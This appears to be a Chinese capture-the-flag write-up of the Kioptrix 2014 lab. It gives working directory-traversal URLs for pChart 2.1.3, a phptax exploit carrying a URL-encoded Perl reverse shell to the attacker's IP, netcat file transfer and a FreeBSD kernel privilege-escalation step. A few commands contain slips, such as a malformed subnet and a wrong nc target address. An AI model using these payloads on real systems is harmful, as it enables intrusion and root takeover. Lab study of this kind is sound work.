信息收集
发现主机
sudo nmap -sn 1922/168.159.0/24
判断靶机地址为:192.168.159.141
端口扫描
sudo nmap -sT -p- --min-rate 10000 192.168.159.141
开放端口为:80、8080
详细信息
sudo nmap -sT -p 22,80,8080 -sV -sC -O 192.168.159.141
80、8080端口:Apache httpd 2.2.21、mod_ssl/2.2.21、OpenSSL/0.9.8q、DAV/2、PHP/5.3.8
操作系统:FreeBSD
目录信息
dirb http://192.168.159.141/
扫描目录,没有看到其他目录
查看网页源码
发现一个URL路径:pChart2.1.3/index.php
访问web页面(80、8080)
80端口
访问该路径
我们可以看到:Release 2.1.3
使用Expoit-DB
搜索一下该版本有没有漏洞
发现存在漏洞
8080端口
访问8080端口页面显示Forbidden
发现漏洞
使用Expoit-DB
搜索到的pChart2.1.3路径穿越漏洞Exp
进行检测
下载Exp,找到playload
开始构造playload
http://192.168.159.141/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
在URL输入playload
我们可以看到操作系统为FreeBSD 9.0
,拥有root权限的用户:root和toor。
我们前面访问8080端口失败,那先利用这个漏洞查看FreeBSD系统下Apache配置
。
看看文件路径
构造playload,查看配置文件
http://192.168.159.141/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf
找到8080端口页面,可以看到被允许访问的user-agent:Mozilla/4.0 Mozilla4_browser
漏洞利用
访问8080端口,使用burpsuite
拦截数据包,将user-agent修改
修改前
修改后
放行数据包,页面返回一个目录:phptax
回显页面,如图:
看看phptax
有没有漏洞
searchsploit phptax
回显存在漏洞,第一个是msf的,我们看看后面两个
复制EXP并进行查看
sudo searchsploit phptax -m 21665
我们也可以在GitHub上搜索Exp,将其下载
https://github.com/NHPT/phptaxExploit
解压zip文件
unzip phptaxExploit-main.zip
监听4444端口
nc -lvvp 4444
执行exp
python3 phptax_exp.py -u http://192.168.159.141:8080/phptax -e perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.159.140%22%3B%24p%3D4444%3Bsocket(S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr_in(%24p%2Cinet_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B%27
成功getshell
提权
成功getshell后我们先看看用户信息
whoami #查看用户
uname -a #查看内核信息
sudo su #看看能不能直接提权
我们可以看到系统为:FreeBSD 9.0
搜索一下看看有没有内核漏洞
searchsploit FreeBSD 9.0
发现存在漏洞,将exp保存到一个文件夹中
sudo searchsploit FreeBSD -m 28718
回到反弹的shell,看看有什么方式可以将exp传进靶机
which nc
which wget
which curl
发现靶机上没wget和curl,但是有nc,于是用nc传文件
查看有无gcc
which gcc
在攻击机输入下面指令
nc -lp 8888 < 28718.c
shell中输入下面指令
nc -nv 192.168.159.141 8888 > exp.c
编译exp
gcc -o exp exp.c
运行exp,成功提权
./exp
原文始发于微信公众号(泷羽Sec-Z1eaf):靶场历险记-Kioptrix:2014
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论